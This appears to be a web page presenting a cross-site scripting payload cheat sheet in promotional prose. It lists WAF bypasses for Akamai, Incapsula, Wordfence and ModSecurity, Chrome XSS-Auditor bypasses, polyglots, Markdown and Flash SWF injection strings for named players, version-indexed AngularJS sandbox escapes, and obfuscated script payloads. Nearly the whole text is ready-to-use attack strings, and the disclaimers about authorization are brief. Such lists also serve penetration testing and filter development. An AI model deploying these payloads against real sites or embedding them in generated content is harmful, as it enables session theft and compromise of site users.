🦊The Art of XSS Exploitation
In the fast-paced realm of cybersecurity, where every click can hide a lurking danger, a new breed of tech-savvy guardians is rising. Armed with code and creativity, they venture into the uncharted territory of Cross-Site Scripting (XSS) vulnerabilities. Join us on this exciting journey through the art of XSS exploration.
Chrome XSS-Auditor Bypasses: Crafting the Perfect Code
Meet the masterminds of code manipulation. @vivekchsm demonstrates a dazzling Chrome XSS-Auditor Bypass:
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>But wait, there's more! Dive into the pre-v60 beta Chrome XSS-Auditor Bypass:
<script src="data:,alert(1)%250A-->For those who crave variety, try these other Chrome XSS-Auditor Bypasses:
<script>alert(1)</script<script>alert(1)%0d%0a-->%09</script<x>%00%00%00%00%00%00%00<script>alert(1)</script>Safari's XSS Vector: Where Art Meets Mischief
@mramydnei unveils a mesmerizing Safari XSS Vector:
<script>location.href;'javascript:alert%281%29'</script>XSS Polyglot: The Multilingual Mischief Maker
Ahmed Elsobky presents the XSS Polyglot, a true linguistic masterpiece:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eBreaking Kona WAF (Akamai) Barriers: A Stroke of Genius
Witness the brilliance of Kona WAF (Akamai) Bypass:
\');confirm(1);//Mastering ModSecurity WAF Bypass: A Strategic Endeavor
Bypassing ModSecurity WAF is an art that depends on the application's security level. A true artist knows the rules. Learn more.
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>Wordfence XSS Bypasses: A Symphony of Vulnerabilities
Unlock the hidden potential of Wordfence XSS Bypasses:
<meter onmouseover="alert(1)"'">><div><meter onmouseover="alert(1)"</div>">><marquee loop=1 width=0 onfinish=alert(1)>Incapsula WAF Bypasses: A Choreography of Code
@i_bo0om orchestrates Incapsula WAF Bypasses:
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>jQuery < 3.0.0 XSS: Unveiling Vulnerabilities
Egor Homakov reveals the jQuery XSS with these captivating lines of code:
$.get('http://sakurity.com/jqueryxss')Unlock the full potential of this jQuery XSS by exploring cross-domain requests and trusted API endpoints.
URL Verification Bypass: A Journey Beyond 	
Take your exploits to new heights with URL verification bypasses:
javas	cript://www.google.com/%0Aalert(1)Markdown XSS: A Subtle Intrusion
Explore the art of Markdown XSS with these intriguing examples:
[a](javascript:confirm(1))[a](javascript://www.google.com%0Aprompt(1))[a](javascript://%0d%0aconfirm(1))[a](javascript://%0d%0aconfirm(1);com)[a](javascript:window.onerror=confirm;throw%201)[a]: (javascript:prompt(1))[a]:(javascript:alert(1)) //Add SOH CharacterFlash SWF XSS: A World of Imagination
Delve into the enchanting realm of Flash SWF XSS, where creativity knows no bounds:
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swfNote: For a comprehensive guide on constructing Flash-based XSS payloads, refer to MWR Labs.
Lightweight Markup Languages: A World of Hidden Vulnerabilities
Discover vulnerabilities lurking in lightweight markup languages:
RubyDoc (.rdoc)
XSS[JavaScript:alert(1)]Textile (.textile)
"Test link":javascript:alert(1)reStructuredText (.rst)
`Test link`__.
__ javascript:alert(document.domain) Unleashing Unicode Characters: A Silent Intrusion
Decode the hidden messages within Unicode characters:
†‡•<img src=a onerror=javascript:alert('test')>…‰€AngularJS Template Injection: The Art of Manipulation
Navigate through the evolution of AngularJS Template Injection:
1.0.1 - 1.1.5 by Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}1.2.0 - 1.2.1 by Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}1.2.6 - 1.2.18 by Jan Horn (Google)
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}1.2.19 - 1.2.23 by Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}1.3.0 by Gábor Molnár (Google)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}1.3.19 by Gareth Heyes (PortSwigger)
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}Content Security Policy (CSP) Bypass: A Dance with Danger
Unlock the secrets of bypassing CSP using JSONP endpoints. First, grab the target's CSP:
curl -I http://example.com | grep 'Content-Security-Policy'Then, explore JSONP endpoints on whitelisted domains with a Google dork:
site:example.com inurl:callbackDealing with Encoded or Deleted Attributes
In some cases, you might encounter situations where you cannot escape from the attribute you're targeting, as it's either encoded or deleted by the web application's security mechanisms. Here are some payload examples to consider:
<!-- 1) Basic JavaScript alert -->
<a href="javascript:alert(1)">Click</a>
<!-- 2) Using ASCII code for null character -->
<a href="javascript:alert(1)">Click</a>
<!-- 3) Utilizing curly braces -->
<a href="javascript:{ alert`0` }">Click</a>
<!-- 4) Using an event handler -->
<a src="google.com" onclick="alert(1)">Click</a>Escaping from Encoded or Deleted Tags
If you find yourself in a situation where you can escape from the attribute but not from the tag itself (typically when the < or > characters are encoded or deleted), you can try these payload examples:
<!-- 1) Input field with an onclick event -->
<input value"XXXXXXX" onclick=alert(1)>Click</input>
<!-- 2) Input field with various attributes -->
<input type:"text" value="XSS" accesskey="x" onclick="alert(1)" >
<!-- 3) Image tag with encoded characters -->
<img src=x onerror="javascript:alert('XSS')">
<!-- 4) Link tag with encoded JavaScript -->
<div><a src="google.com" href="javaSCRIPT:alert(/xss/)">XSS</a>
<!-- 5) Link tag with JavaScript in an onclick event -->
<a href=https://google.com onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>Dealing with Encoded Alerts
When the alert function itself is encoded or deleted, you can use more complex payload examples to trigger alerts:
<!-- 1) Complex JavaScript payload to bypass encoding -->
<script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</script>
<!-- 2) Another complex JavaScript payload -->
<script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>
<!-- 3) Yet another complex JavaScript payload -->
<script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+`(1)`)()</script>
<!-- 4) Simple prompt alert -->
<script>prompt(1)</script>Handling Encoded Spaces
If spaces are encoded or deleted, you can use tab URL encoding (%09) to insert spaces where needed:
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>Handling Encoded Parentheses
To handle encoded or deleted parentheses, you can use backticks (`) in JavaScript:
<!-- Encoded parentheses in alert function -->
<script>alert\`1\`</script>Trying Different Tags
If the <script> tag is encoded or deleted by security mechanisms, consider using other HTML tags like <svg>, <img>, or <iframe> to execute your JavaScript code.
WAF Bypass Techniques
Web Application Firewalls (WAFs) may block certain payloads. Here are some WAF bypass techniques shared by security researchers. Always use them responsibly and with proper authorization:
Bypass AWS WAF by adding "<!" before your payload.
Bypass Akamai Ghost WAF by using URL encoding.
Bypass DotDefender WAF using a crafted
<div>element.Bypass CloudFlare using various payload formats.
Useful Resources
XSS PolyglotsPolice
XSS PolyglotsPolice is a tool that allows you to test multiple XSS scenarios with a single payload. It can help you work more efficiently and effectively when testing for cross-site scripting vulnerabilities. Always follow responsible disclosure practices when reporting security issues to website owners or administrators.
Embrace the world of XSS exploitation, where creativity and code converge to challenge the boundaries of digital security. Remember, with great power comes great responsibility. Stay ethical, stay safe, and continue to push the boundaries of cybersecurity.
Last updated
Was this helpful?